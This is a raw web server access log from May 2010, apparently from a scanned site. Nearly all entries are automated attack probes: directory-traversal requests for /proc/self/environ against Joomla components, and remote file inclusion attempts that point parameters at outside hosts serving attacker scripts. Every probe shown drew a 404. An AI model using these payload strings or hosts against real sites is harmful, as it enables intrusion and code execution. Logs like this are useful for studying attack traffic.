207.46.13.93 - - [23/May/2010:06:09:34 -0500] "GET /logs/access_log.1196899200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.6.141.218 - - [23/May/2010:06:09:49 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
202.6.141.218 - - [23/May/2010:06:09:50 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
97.74.75.246 - - [23/May/2010:06:09:58 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
212.241.251.224 - - [23/May/2010:06:10:02 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.241.251.224 - - [23/May/2010:06:10:02 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.241.251.224 - - [23/May/2010:06:10:02 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
97.74.75.246 - - [23/May/2010:06:10:26 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:10:27 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:10:33 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:10:39 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:10:44 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:10:45 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
217.73.226.100 - - [23/May/2010:06:10:57 -0500] "GET /video.php?content=http://christenplein.com/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:06:10:57 -0500] "GET /logs/video.php?content=http://christenplein.com/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
217.73.226.100 - - [23/May/2010:06:10:57 -0500] "GET /logs/access_log.1271116800/video.php?content=http://christenplein.com/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:06:10:58 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
207.45.185.154 - - [23/May/2010:06:10:58 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
97.74.75.246 - - [23/May/2010:06:11:28 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:11:28 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
121.78.118.123 - - [23/May/2010:06:11:30 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
121.78.118.123 - - [23/May/2010:06:11:30 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.78.118.123 - - [23/May/2010:06:11:31 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
97.74.75.246 - - [23/May/2010:06:11:37 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:11:43 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
97.74.75.246 - - [23/May/2010:06:11:43 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
65.89.55.2 - - [23/May/2010:06:13:04 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.219.173.32 - - [23/May/2010:06:13:55 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
94.23.20.123 - - [23/May/2010:06:14:59 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:06:14:59 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:06:15:02 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.20.123 - - [23/May/2010:06:15:02 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
118.129.167.25 - - [23/May/2010:06:16:38 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:06:16:38 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:06:16:38 -0500] "GET /logs/access_log.1271548800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:06:16:44 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:06:16:45 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:06:16:45 -0500] "GET /logs/access_log.1271548800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
94.23.0.30 - - [23/May/2010:06:16:59 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.0.30 - - [23/May/2010:06:17:00 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
89.108.70.32 - - [23/May/2010:06:17:31 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
89.108.70.32 - - [23/May/2010:06:17:31 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.108.70.32 - - [23/May/2010:06:17:32 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
195.159.29.178 - - [23/May/2010:06:17:49 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
195.159.29.178 - - [23/May/2010:06:17:50 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
64.22.67.37 - - [23/May/2010:06:17:53 -0500] "GET //Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.22.67.37 - - [23/May/2010:06:17:53 -0500] "GET /logs/access_log.1273017600//Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
64.22.67.37 - - [23/May/2010:06:17:53 -0500] "GET /logs//Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.22.67.37 - - [23/May/2010:06:17:54 -0500] "GET //Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.22.67.37 - - [23/May/2010:06:17:54 -0500] "GET /logs//Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.22.67.37 - - [23/May/2010:06:17:54 -0500] "GET /logs/access_log.1273017600//Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:06:17:58 -0500] "GET /logs/access_log.1270771200//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:06:17:58 -0500] "GET /logs/access_log.1272499200//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:06:18:08 -0500] "GET /logs/access_log.1270771200//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
118.129.167.25 - - [23/May/2010:06:18:08 -0500] "GET /logs/access_log.1272499200//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
64.22.67.37 - - [23/May/2010:06:18:21 -0500] "GET //Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.22.67.37 - - [23/May/2010:06:18:21 -0500] "GET /logs//Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.22.67.37 - - [23/May/2010:06:18:21 -0500] "GET /logs/access_log.1273017600%20%20//Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.22.67.37 - - [23/May/2010:06:18:24 -0500] "GET //Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.22.67.37 - - [23/May/2010:06:18:24 -0500] "GET /logs//Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.22.67.37 - - [23/May/2010:06:18:24 -0500] "GET /logs/access_log.1273017600%20%20//Packages.php?sourcedir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
125.214.72.143 - - [23/May/2010:06:19:03 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
125.214.72.143 - - [23/May/2010:06:19:04 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
195.159.29.178 - - [23/May/2010:06:19:39 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
195.159.29.178 - - [23/May/2010:06:19:39 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
195.159.29.178 - - [23/May/2010:06:19:40 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
195.159.29.178 - - [23/May/2010:06:19:40 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
212.124.108.80 - - [23/May/2010:06:20:01 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
212.124.108.80 - - [23/May/2010:06:20:01 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
89.108.70.32 - - [23/May/2010:06:20:36 -0500] "GET /logs/access_log.1273017600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.108.70.32 - - [23/May/2010:06:20:37 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.108.70.32 - - [23/May/2010:06:20:37 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
121.78.118.123 - - [23/May/2010:06:20:45 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
195.159.29.178 - - [23/May/2010:06:21:01 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
195.159.29.178 - - [23/May/2010:06:21:01 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
195.159.29.178 - - [23/May/2010:06:21:15 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
195.159.29.178 - - [23/May/2010:06:21:15 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
94.23.0.30 - - [23/May/2010:06:21:22 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [23/May/2010:06:21:23 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.0.30 - - [23/May/2010:06:21:36 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [23/May/2010:06:21:36 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.0.30 - - [23/May/2010:06:21:50 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.0.30 - - [23/May/2010:06:21:50 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.0.30 - - [23/May/2010:06:21:51 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.0.30 - - [23/May/2010:06:21:51 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
211.19.31.123 - - [23/May/2010:06:22:12 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.19.31.123 - - [23/May/2010:06:22:13 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.52.35.234 - - [23/May/2010:06:22:45 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.52.35.234 - - [23/May/2010:06:22:45 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.52.35.234 - - [23/May/2010:06:22:47 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.52.35.234 - - [23/May/2010:06:22:47 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
89.163.148.130 - - [23/May/2010:06:23:49 -0500] "GET /logs//includes/db_adodb.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
89.163.148.130 - - [23/May/2010:06:23:49 -0500] "GET //includes/db_adodb.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
89.163.148.130 - - [23/May/2010:06:24:14 -0500] "GET //includes/db_adodb.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
211.239.161.143 - - [23/May/2010:06:24:22 -0500] "GET //includes/db_adodb.php?baseDir=http://klip.interfree.it/id.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
211.239.161.143 - - [23/May/2010:06:24:23 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://klip.interfree.it/id.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
89.108.70.32 - - [23/May/2010:06:24:53 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.195.112.180 - - [23/May/2010:06:24:59 -0500] "GET /logs/access_log.1226880000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.26.227.88 - - [23/May/2010:06:25:37 -0500] "GET /logs/access_log.1270771200//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.26.227.88 - - [23/May/2010:06:25:37 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
212.26.227.88 - - [23/May/2010:06:25:38 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
212.26.227.88 - - [23/May/2010:06:25:38 -0500] "GET /logs/access_log.1272499200//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.239.161.143 - - [23/May/2010:06:25:38 -0500] "GET //includes/db_connect.php?baseDir=%0Did.jpg?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
211.239.161.143 - - [23/May/2010:06:25:39 -0500] "GET /logs//includes/db_connect.php?baseDir=%0Did.jpg?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
89.163.148.130 - - [23/May/2010:06:26:05 -0500] "GET /logs/access_log.1273017600//includes/db_adodb.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 333 "-""libwww-perl/5.805"
89.163.148.130 - - [23/May/2010:06:26:05 -0500] "GET //includes/db_adodb.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
89.163.148.130 - - [23/May/2010:06:26:05 -0500] "GET /logs//includes/db_adodb.php?baseDir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
74.52.35.234 - - [23/May/2010:06:28:26 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.52.35.234 - - [23/May/2010:06:28:26 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.52.35.234 - - [23/May/2010:06:28:27 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.52.35.234 - - [23/May/2010:06:28:39 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.52.35.234 - - [23/May/2010:06:28:39 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.52.35.234 - - [23/May/2010:06:28:40 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
81.80.122.44 - - [23/May/2010:06:29:55 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:29:55 -0500] "GET //includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:29:55 -0500] "GET /logs/access_log.1271548800//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:29:56 -0500] "GET //includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:29:56 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:30:19 -0500] "GET //includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:31:15 -0500] "GET //includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:31:16 -0500] "GET //includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:31:31 -0500] "GET //includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
207.46.13.84 - - [23/May/2010:06:31:33 -0500] "GET /logs/access_log.1174348800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.80.122.44 - - [23/May/2010:06:31:41 -0500] "GET //includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
211.239.161.143 - - [23/May/2010:06:33:03 -0500] "GET //includes/db_adodb.php?baseDir=http://klip.interfree.it/id.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
211.239.161.143 - - [23/May/2010:06:33:04 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://klip.interfree.it/id.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
220.194.62.53 - - [23/May/2010:06:33:48 -0500] "GET /logs//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:06:33:48 -0500] "GET /logs/access_log.1212451200//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:06:33:48 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:06:34:18 -0500] "GET /logs/access_log.1212451200//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:06:34:18 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.194.62.53 - - [23/May/2010:06:34:18 -0500] "GET /logs//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:35:04 -0500] "GET /logs/access_log.1266537600//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:35:04 -0500] "GET //includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:35:04 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:35:47 -0500] "GET /logs/access_log.1273017600//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:35:47 -0500] "GET //includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:35:47 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.250.255.243 - - [23/May/2010:06:35:51 -0500] "GET /logs/access_log.1217808000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.53 - - [23/May/2010:06:36:03 -0500] "GET /logs/access_log.1214092800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.80.122.44 - - [23/May/2010:06:37:27 -0500] "GET /logs/access_log.1273017600//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
